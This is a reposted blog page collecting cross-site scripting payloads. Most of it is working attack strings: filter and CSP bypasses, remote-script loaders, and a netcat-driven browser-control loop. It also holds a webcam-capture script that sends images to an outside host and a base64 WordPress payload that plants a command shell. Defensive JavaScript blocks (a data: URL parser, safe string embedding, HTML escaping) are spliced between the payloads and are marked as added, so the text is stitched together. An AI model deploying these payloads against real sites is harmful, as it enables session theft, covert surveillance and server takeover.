XSS payloads collected over the years

墨茶    4 years ago  3.6k views  0 comments  30017 characters  Repost

This article was collected from the internet.

XSS 101

<h1>Hello,<script>alert(1)</script>!</h1>

1. With <script> tag
<script>alert(1)</script>

2. With regular HTML tags

2.1 Event-based

<TAG EVENT=alert(1)>
<body onload=alert(1)>
<img src=1 onerror=alert(1)>
<svg onload=alert(1)>
<x onmouseover=alert(1)>

2.2 Resource-based

<TAG RESOURCE=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<object data=javascript:alert(1)>
<script>alert(document.domain)</script>

2.1. Steal a user's session on the vulnerable website (including admins)

2.2. Capture the keys pressed by the user

2.3. Deface the page, serving any type of content

2.4. Trick the user into giving his/her credentials by means of a fake HTML form

2.5. Crash the browser (local denial of service)

2.6. Force download of files

2.7. Redirect the user's browser to another website where his/her machine can be compromised by memory exploits

The format of the data: pseudo-protocol is:
data:[<MIME-type>][;charset=<encoding>][;base64],<data>

<script src="data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="></script>
<script src=data:text/html;base64,YWxlcnQoZG9jdW1lbnQuY29va2llKQ==></script>
<script src=data:text/html;,alert(document.cookie)></script>
<script src=data:text/html,alert(document.cookie)></script>
<script src=data:,alert(document.cookie)></script>
<script src="data:text/html;base64,YWxlcnQoMSk="></script>
<script src=data:text/html;base64,YWxlcnQoMSk=></script>
<script src=data:text/html;,alert(1)></script>
<script src=data:text/html,alert(1)></script>
<script src=data:,alert(1)></script>
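
The data: grammar quoted above can be checked mechanically. The following is an added example, not code from the original page: a parser for the data:[<MIME-type>][;charset=<encoding>][;base64],<data> form and a conservative policy function built on it, so that a reviewer or sanitizer can see what a src or href value would actually load instead of matching on the string "data:". The function names, the image-only policy and the sample inputs are assumptions of this example.

```javascript
// Added example (not from the original page): parse a data: URL of the form
//   data:[<MIME-type>][;charset=<encoding>][;base64],<data>
// and return what a browser would load from it.
function parseDataUrl(url) {
  if (typeof url !== 'string') return null;
  // The scheme is matched case-insensitively and leading whitespace is
  // tolerated, because browsers accept "DATA:" and " data:" alike.
  const m = /^\s*data:([^,]*),([\s\S]*)$/i.exec(url);
  if (!m) return null;
  const params = m[1].split(';').map((s) => s.trim());
  // An empty media type defaults to text/plain (RFC 2397).
  const mime = (params[0] || 'text/plain').toLowerCase();
  let charset = 'us-ascii';
  let base64 = false;
  for (const p of params.slice(1)) {
    if (/^base64$/i.test(p)) base64 = true;
    else if (/^charset=/i.test(p)) charset = p.slice(8).toLowerCase();
  }
  let body;
  if (base64) {
    body = typeof Buffer !== 'undefined'
      ? Buffer.from(m[2], 'base64').toString('utf8')
      : atob(m[2]);
  } else {
    try {
      body = decodeURIComponent(m[2]);
    } catch (e) {
      body = m[2]; // malformed percent-sequence: keep the raw payload
    }
  }
  return { mime, charset, base64, body };
}

// Policy check for attribute values (assumed policy, not from the page):
// accept only data: URLs that carry a raster image. image/svg+xml is
// excluded on purpose because SVG documents can run script.
function isSafeImageDataUrl(url) {
  const d = parseDataUrl(url);
  if (!d) return false;
  return /^image\/(png|jpeg|gif|webp)$/.test(d.mime);
}
```

Running parseDataUrl over the ten payloads listed above shows why a blocklist on the MIME type is not enough: half of them carry no type at all and still decode to the same alert(document.cookie) body, so a policy has to be an allow-list on the decoded result.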

<body><svg><x><script>alert(1)</script></x></svg></body>
<svg><x><script>alert(1)</x>
<svg><a><script>alert(1)</a>

XSS Cheat Sheet

HTML Context Tag Injection

<svg onload=alert(1)>
"><svg onload=alert(1)//

HTML Context Inline Injection

"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//

Javascript Context Code Injection

'-alert(1)-'
'-alert(1)//

Javascript Context Code Injection (escaping the escape)

\'-alert(1)//

Javascript Context Tag Injection

</script><svg onload=alert(1)>

PHP_SELF Injection

http://DOMAIN/PAGE.php/"><svg onload=alert(1)>

Without Parenthesis

<svg onload=alert`1`>

Filter Bypass Alert Obfuscation

(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)

Body Tag

<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)

Miscellaneous Vectors

<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!

Agnostic Event Handlers

<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!

Agnostic Event Handlers

<brute contenteditable onblur=alert(1)>lose focus!
<brute onclick=alert(1)>click this!
<brute oncopy=alert(1)>copy this!
<brute oncontextmenu=alert(1)>right click this!
<brute oncut=alert(1)>copy this!
<brute ondblclick=alert(1)>double click this!
<brute ondrag=alert(1)>drag this!
<brute contenteditable onfocus=alert(1)>focus this!
<brute contenteditable oninput=alert(1)>input here!
<brute contenteditable onkeydown=alert(1)>press any key!
<brute contenteditable onkeypress=alert(1)>press any key!
<brute contenteditable onkeyup=alert(1)>press any key!
<brute onmousedown=alert(1)>click this!
<brute onmousemove=alert(1)>hover this!
<brute onmouseout=alert(1)>hover this!
<brute onmouseover=alert(1)>hover this!
<brute onmouseup=alert(1)>click this!
<brute contenteditable onpaste=alert(1)>paste here!
<brute style=font-size:500px onmouseover=alert(1)>0000
<brute style=font-size:500px onmouseover=alert(1)>0001
<brute style=font-size:500px onmouseover=alert(1)>0002
<brute style=font-size:500px onmouseover=alert(1)>0003

Code Reuse Inline Script

<script>alert(1)//
<script>alert(1)<!--

Code Reuse Regular Script

<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>

Filter Bypass Generic Tag + Handler

Encoding

<x onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1

Mixed Case

<X onxxx=1
<x OnXxx=1
<X OnXxx=1 

Doubling

<x onxxx=1 onxxx=1

Spacers

<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1

Quotes

<x 1='1'onxxx=1
<x 1="1"onxxx=1

Stripping

<[S]x onx[S]xx=1
[S] = stripped char or string

Mimetism

<x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/

Generic Source Breaking

<x onxxx=alert(1) 1='

Source-Breaking Injections

onafterscriptexecute

onbeforescriptexecute

if (brute)
alert("Congratz, buddy!");
else
alert("Almost there, try again.");

Browser Control

<svg onload=setInterval(function(){with(document)body.
appendChild(createElement('script')).src='//HOST:PORT'},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done

Using XSS to Control a Browser

<svg onload=setInterval(function(){d=document;
z=d.createElement("script");z.src="//HOST:PORT";
d.body.appendChild(z)},0)>
setInterval(code, 0)
function(){code}
d=document;
z=d.createElement("script");
z.src="//HOST:PORT";
d.body.appendChild(z)
<svg/onload=setInterval(function(){with(document)body.
appendChild(createElement("script")).src="//HOST:PORT"},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done

Multi Reflection

Double Reflection

Single Input

'onload=alert(1)><svg/1='
Single Input (script-based)
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*

Triple Reflection

Single Input

*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='

Single Input (script-based)

*/</script>'>alert(1)/*<script/1='

Multi Input

Double Input

p=<svg/1='&q='onload=alert(1)>

Triple Input

p=<svg 1='&q='onload='/*&r=*/alert(1)'>

Multi Reflection XSS

<svg onload=write(1)>
p='onload=alert(1)><svg/1='
'onload=alert(1)><svg/1='
… [code] …
'onload=alert(1)><svg/1='
p='>alert(1)</script><script/1='
p=*/alert(1)</script><script>/*
*/alert(1)</script><script>/*
… [code] …
*/alert(1)</script><script>/*
p=*/alert(1)">'onload="/*<svg/1='
p=`-alert(1)">'onload="`<svg/1='
`-alert(1)">'onload="`<svg/1='
… [code] …
`-alert(1)">'onload="`<svg/1='
… [code] …
`-alert(1)">'onload="`<svg/1='
p=*/</script>'>alert(1)/*<script/1='
*/</script>'>alert(1)/*<script/1='
… [code] …
*/</script>'>alert(1)/*<script/1='
… [code] …
*/</script>'>alert(1)/*<script/1='
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
var n = {a: "$p", b: "$p"};
(double reflection, single input $p)
var n = {a: "$p", b: "$q"};
(double reflection, double input $p and $q)

INPUT

p=-alert(1)}//\
RESULT*
var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"};

INPUT

p=\&q=-alert(1)//
RESULT*
var n = {a: "\", b: "-alert(1)}//"};
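
The two inputs above break the template var n = {a: "$p", b: "$q"} because the server escaped only the quote, so a trailing backslash in $p neutralises the escape that should have closed the first string. The following is an added example, not code from the original page: the naive template beside a hardened one that builds the string literals with JSON.stringify, plus a small round-trip oracle used to check both. The function names, the escaping choice (\u003c for "<" and the U+2028/2029 line terminators) and the use of new Function as an oracle are assumptions of this example; alert is not defined in the test runtime, so a successful breakout shows up as an error, not a popup.

```javascript
// Added example (not from the original page): embedding untrusted values into
// a JavaScript string literal, the weak way and the safe way.

// Naive: only double quotes are escaped. A value ending in a backslash
// turns the closing quote into an escaped one, so the literal keeps running.
function naiveEmbed(p, q) {
  const esc = (s) => String(s).replace(/"/g, '\\"');
  return `var n = {a: "${esc(p)}", b: "${esc(q)}"};`;
}

// Hardened: JSON.stringify emits a complete literal (backslashes, quotes and
// control characters escaped). The extra replacements keep the literal from
// terminating an enclosing <script> block or breaking on U+2028/U+2029,
// which JSON allows unescaped but older JS engines treat as line breaks.
function jsString(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function safeEmbed(p, q) {
  return `var n = {a: ${jsString(p)}, b: ${jsString(q)}};`;
}

// Oracle for the examples: evaluate the generated statement and return n, or
// null if the source no longer parses and executes as the intended object.
// (Test-only helper; do not evaluate untrusted source in production.)
function roundTrip(src) {
  try {
    return new Function(src + ' return n;')();
  } catch (e) {
    return null;
  }
}
```

With the page's inputs, roundTrip(naiveEmbed(...)) returns null because the injected code reaches the parser or the runtime, while roundTrip(safeEmbed(...)) hands back an object whose a and b are exactly the two inputs, backslash and all.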

Without Event Handlers

<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/onload=alert(1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

XSS Without Event Handlers

data:text/html,<script>alert(1)</script>

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

1) (no attribute)

<script>alert(1)</script>

2) src

<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)> *

3) href

<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click *

4) action

<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click> *

5) formaction

<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=http://brutelogic.com.br/webgun/img/youtube1.jpg>
<isindex formaction=javascript:alert(1) type=submit value=click> *

6) data

<object data=javascript:alert(1)> *

7) srcdoc

<iframe srcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>

8) xlink:href

<svg><script xlink:href=data:,alert(1)></script>
<svg><script xlink:href=data:,alert(1) /> *
<math><brute xlink:href=javascript:alert(1)>click *

9) from

<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>

Mobile Only

Event Handlers

<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>

Javascript

Properties

<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>

Functions

<svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>

XSS in Mobile Devices

<body onorientationchange=alert(orientation)>
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>
<script>
navigator.geolocation.getCurrentPosition(function(p){
alert('Latitude:'+p.coords.latitude+',Longitude:'+
p.coords.longitude+',Altitude:'+p.coords.altitude);})
</script>
<script>
d=document;
v=d.createElement('video');
c=d.createElement('canvas');
c.width=640;
c.height=480;
navigator.webkitGetUserMedia({'video':true},function(s){
v.src=URL.createObjectURL(s);v.play()},function(){});
c2=c.getContext('2d');
x='c2.drawImage(v,0,0,640,480);fetch("//HOST/"+c2.canvas.toDataURL())';
setInterval(x,5000);
</script>
open(c2.canvas.toDataURL())
<svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>

Generic Self to Regular XSS

<iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>

Leveraging Self-XSS

POST to GET

Copy & Paste

XSS + CSRF

<iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
<iframe src=//localhost/self/logout.php
onload=forms[0].submit()></iframe><form method=POST
action=//localhost/self/login.php?returnURL=changemail.php>
<input name=username value=brute>
<input name=password value=logic>

File Upload

Injection in Filename

"><img src=1 onerror=alert(1)>.gif

Injection in Metadata

$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg

Injection with SVG File

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

Injection with GIF File as Source of Script (CSP Bypass)

GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

File Upload XSS

1) Filename

2) Metadata

$ exiftool -FIELD=XSS FILE

$ exiftool -Artist=' "><img src=1 onerror=alert(document.domain)>' brute.jpeg

3) Content

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

4) Source

GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

Google Chrome Auditor Bypass (up to v51)

<script src="data:,alert(1)//
"><script src=data:,alert(1)//
<script src="//brutelogic.com.br/1.js#
"><script src=//brutelogic.com.br/1.js#
<link rel=import href="data:text/html,<script>alert(1)</script>
"><link rel=import href=data:text/html,<script>alert(1)</script>

Chrome XSS Bypass

"><script src=data:%26comma;alert(1)-"
<input value="INPUT">
<input value=""><script src=data:%26comma;alert(1)-"">
<script src="URL"></script>
<script type="text/javascript"></script>

PHP File for XHR Remote Call

<?php header("Access-Control-Allow-Origin: *"); ?>
<img src=1 onerror=alert(1)>

CORS Enabled XSS

<?php header("Access-Control-Allow-Origin: *"); ?>
<img src=1 onerror=alert(document.domain)>
#data:text/html,<img src=1 onerror=alert(document.domain)

Server Log Avoidance

<svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1))>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>

Avoiding XSS Detection

with(document)body.appendChild(createElement('script')).src='//DOMAIN'
<svg/onload=eval(location.hash.slice(1))>#with(document)
body.appendChild(createElement('script')).src='//DOMAIN'
#with(document)body.appendChild(createElement
(/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
<svg/onload=eval(atob(location.hash.slice(1)))>
#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNv
dXJjZSk=
<svg/onload=eval(atob(URL.slice(-148)))>
#d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
F0ZUVsZW1lbnQoL3NjcmlwdC8uc291cmNlKSkuc3JjPWF0b
2IoL0x5OWljblYwWld4dloybGpMbU52YlM1aWNpOHkvLnNv
dXJjZSk=

Shortest PoC

<base href=//0>
$ while :; do echo "alert(1)" | nc -lp80; done

Portable WordPress RCE

<script/src="data:,eval(atob(location.hash.slice(1)))//#
#eD1uZXcgWE1MSHR0cFJlcXVlc3QoKQ0KcD0nL3dwLWFkbWluL3Bsd
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
5yZXNwb25zZVRleHQpWzFdKycmbmV3Y29udGVudD08Pz1gJF9HRV
RbYnJ1dGVdYDsmYWN0aW9uPXVwZGF0ZSYnK2YNCngub3BlbignUE
9TVCcscCtmLDEpDQp4LnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHl
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
Qp4LnNlbmQoJCk=
http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD

* In URLs:
& => %26 , # => %23 , + => %2B

<a href=javascript:alert(1)>
Javascript:alert(1)

(URL-encoded form)
Javas%26%2399;ript:alert(1)

<iframe src=javascript:alert(1)>
http(s)://host/page?p=XSS
<object data=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
<embed src=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
<iframe src=?p=%26lt;svg/o%256Eload%26equals;alert(1)%26gt;>
"><iframe src="/tests/cors/%23/tests/auditor.php?q1=<img/src=x onerror=alert(1)"
%0aalert(1);/"><script>///
<form action="http://brutelogic.com.br/chall/minified.php" method="POST" enctype="multipart/form-data">
<textarea name=p id=p>"
alert(1)-/><script>///</textarea>
</form>
<script>document.forms[0].submit(); </script>
*//"><script>/*alert(1)//
</input/"><svg><script>alert(1)//

Calling Remote Script With Event Handlers

1 – XHR

"var x=new XMLHttpRequest();x.open('GET','//0');x.send();
x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}"

2 – Fetch

fetch('//0').then(function(r){r.text().then(function(w){write(w)})})

3 – Create Element

with(top)body.appendChild(createElement('script')).src='//0'

4 – jQuery Get

$.get('//0',function(r){write(r)})>

5 – jQuery Get Script

$.getScript('//0')

The Easiest Way to Bypass XSS Mitigations

echo $_GET["p"];
echo str_replace(" ", "", $_GET["q"]);
echo $_GET["p"];
echo str_ireplace("<script", "", $_GET["q"]);
echo str_ireplace("<script","InvalidTag", $_GET["r"]);
echo str_ireplace("<script","<InvalidTag", $_GET["s"]);
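
The PHP one-liners above delete or rename a token in the input. The following is an added example, not code from the original page: a JavaScript port of the str_ireplace("<script", "", ...) filter so its failure can be checked offline, an idempotence test that any removal filter should pass but this one does not (the "Stripping" entry in the cheat sheet above is exactly the case it fails on), and the replacement that needs no blocklist: encoding for the HTML text and attribute context, the equivalent of htmlspecialchars($s, ENT_QUOTES). Function names and sample inputs are assumptions of this example.

```javascript
// Added example (not from the original page): token removal versus output
// encoding in the HTML context.

// Blocklist removal, as in str_ireplace("<script", "", $q): one pass,
// case-insensitive.
function stripScriptOnce(s) {
  return String(s).replace(/<script/gi, '');
}

// A removal filter is only trustworthy if applying it twice gives the same
// result as applying it once. Deleting a token can splice the characters on
// either side into a fresh copy of the token, and then the check fails.
function isIdempotent(filter, input) {
  const once = filter(input);
  return filter(once) === once;
}

// HTML-context encoder: every character that can change HTML structure in
// text or inside a quoted attribute becomes a character reference. This is
// lossless (see unescapeHtml), so the value survives intact on the page
// without ever containing a tag opener.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Inverse of escapeHtml, used to show that encoding loses nothing.
const HTML_UNESCAPES = { '&amp;': '&', '&lt;': '<', '&gt;': '>', '&quot;': '"', '&#39;': "'" };
function unescapeHtml(s) {
  return String(s).replace(/&(?:amp|lt|gt|quot|#39);/g, (m) => HTML_UNESCAPES[m]);
}

// Acceptance check for both approaches: does the output still contain the
// start of a tag, end tag, comment or processing instruction?
function containsTagOpener(s) {
  return /<[a-z!\/?]/i.test(s);
}
```

The stripping filter turns `<scr<scriptipt>` into `<script>` in a single pass, fails isIdempotent, and its output still satisfies containsTagOpener; escapeHtml never emits a tag opener and unescapeHtml(escapeHtml(x)) returns x unchanged, which is the property a sanitiser for this context actually needs.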

XSS Authority Abuse

http://alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=eval(URL.slice(7,15))>
http://javascript:alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=location=URL.slice(7,26)>

Bypassing Javascript Overrides

<svg onload=alert(1)>
<svg onload=document.write('XSS')>
<svg onload=document.writeln(decodeURI(location.hash))>#<img src=1 onerror=alert(1)>

The Shortest Reflected XSS Attack Possible

<script src="INPUT"></script>
<script src="//INPUT"></script>
<base href=//0>

Transcending Context-Based Filters

1) among tags

2) inside a tag

3) in a script section

1) preg_replace("/\<script|=/i", "-", $_REQUEST['q']);

2) preg_replace("/on\w+\s*=|\>/i", "-", $_REQUEST['q']);

3) htmlspecialchars($_REQUEST['q'], ENT_QUOTES);

<math><brute href=javascript:alert(1)>

1) <math>

2) " href=javascript:alert(1)

1) <math><!--

2) " href=javascript:alert(1)

<math><!--" href=javascript:alert(1)//
" href=javascript:alert(1) <math><!--
lol video<!--"href=javascript:alert(1) style=font-size:50px;
display:block;color:transparent;
background:url('//brutelogic.com.br/webgun/img/youtube1.jpg');
background-repeat:no-repeat --><math><!--
<svg><!--'-alert(1)-'
'-alert(1)-'<svg><!--
" accesskey=x onclick=alert(1) 1='

Location Based Payloads – Part IV

Document Properties Scheme

protocol://domain/path/page?p= text1 <tag handler=code> text2 # text3

Each line lists the document properties that return the corresponding part of the scheme, in order:

text1: previousSibling.nodeValue, document.body.textContent*
?p=: location.search
<tag handler=code>: tagName, nodeName, outerHTML
text2: textContent, nextSibling.nodeValue, firstChild.nodeValue, lastChild.nodeValue, innerHTML
text3: location.hash

Location Based Payloads – Part III

– Location
– Location Self
– Location Self Plus

before < [itself [inside]] > after # hash
Before: everything before the tag.
Itself: anything that uses the tag name.
Inside: any attribute inside the tag.
After: everything after the tag until hash.
Hash: everything after the # sign.

1) Location

1.1) Location Itself+After+Hash (tagName+innerHTML+location.hash)

<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:/*click me!#*/alert(9)
<javascript onclick=location=tagName%2binnerHTML%2blocation.hash>:'click me!#'-alert(9)

1.2) Location Itself+Hash (tagName+URL)

<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
javascript: + http://domain/page?p=<javascript: onclick=location=tagName%2bURL>click me!#%0Aalert(1)
<javascript:"-' onclick=location=tagName%2bURL>click me!#'-alert(1)
javascript:"-' + http://domain/page?p=<javascript:"-' onclick=location=tagName%2bURL>click me!#'-alert(1)

1.3) Location After+Hash (innerHTML+URL)

<j onclick=location=innerHTML%2bURL>javascript:"-'click me!</j>#'-alert(1)
javascript:"-'click me! + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:"-'click me!</j>#'-alert(1)
<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)
javascript: + http://domain/page?p=<j onclick=location=innerHTML%2bURL>javascript:</j>#%0Aalert(1)

1.4) Location Itself+After+Hash (tagName+innerHTML+URL)

<javas onclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#'-alert(1)
javas + cript:"-'click me! + http://domain/page?p=<javas%20onclick=location=tagName%2binnerHTML%2bURL>cript:"-'click me!</javas>#'-alert(1)
<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
javas + cript: + http://domain/page?p=<javas onclick=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)

1.5) Location Itself+Before (tagName+previousSibling)

"-alert(1)<javascript:" onclick=location=tagName%2bpreviousSibling.nodeValue>click me!
javascript:" + "-alert(1)

1.6) Location Itself+After+Before (tagName+innerHTML+previousSibling)

"-alert(1)<javas onclick=location=tagName%2binnerHTML%2bpreviousSibling.nodeValue>cript:"click me!
javas + cript:" + "-alert(1)

1.7) Location After+Itself (innerHTML+outerHTML)

<alert(1)<!-- onclick=location=innerHTML%2bouterHTML>javascript:1/*click me!*/</alert(1)<!-->
javascript:1/*click me!*/ + <alert(1)<!-- onclick=location=innerHTML%2bouterHTML>
<j 1="*/""-alert(1)<!-- onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
javascript:/* + <j 1="*/""-alert(1)<!-- onclick=location=innerHTML%2bouterHTML>

1.8) Location After+Before+Itself (innerHTML+previousSibling+outerHTML)

*/"<j"-alert(1)<!-- onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
javascript:/*click me! + */" + <x"-alert(9)<!-- onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>
*/"<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
javascript:/*click me! + */" + <x 1=" -alert(9)//" onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>

1.9) Location After (innerHTML)

<j onclick=location=innerHTML>javascript%26colon;alert(1)//
javascript:alert(1)//

1.10) Location Inside (name+id)

<iframe id=t:alert(1) name=javascrip onload=location=name%2bid>
javascrip + t:alert(1)

2) Location Self

2.1) Location Self Inside

<svg id=?p=<svg/onload=alert(1)%2B onload=location=id>
http://domain/page?p=<svg/onload=alert(1)+
<svg id=?p=<script/src=//3237054390/1%2B onload=location=id>
http://domain/page?p=<script/src=//3237054390/1+

2.2) Location Self After

<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
http://domain/page?p=<svg/onload=alert(1)>

3) Location Self Plus

3.1) Location Self Plus Itself

<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
http://domain/page?p=<j%26p=<svg%2Bonload=alert(1)%20onclick=location%2B=outerHTML>click%20me!<j&p=<svg+onload=alert(1) onclick="location+=outerHTML">

3.2) Location Self Plus After

<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
http://domain/page?p=<j%20onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>&p=<svg/onload=alert(1)>

3.3) Location Self Plus Before

%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!
http://domain/page?p=%26p=%26lt;svg/onload=alert(1)><j%20onclick=location%2B=document.body.textContent>click%20me![BODY_CONTENT]&p=<svg/onload=alert(1)>click me!

Location Based Payloads – Part II

<svg onload=alert(tagName)>
<javascript onclick=alert(tagName)>click me!
<javascript onclick=alert(tagName%2Blocation.hash)>click me!#:alert(1)
<javascript: onclick=alert(tagName%2Blocation.hash)>click me!#alert(1)
<javascript: onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
Result => javascript: + /*click me! + #*/alert(1)
<javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>'click me!#'-alert(1)
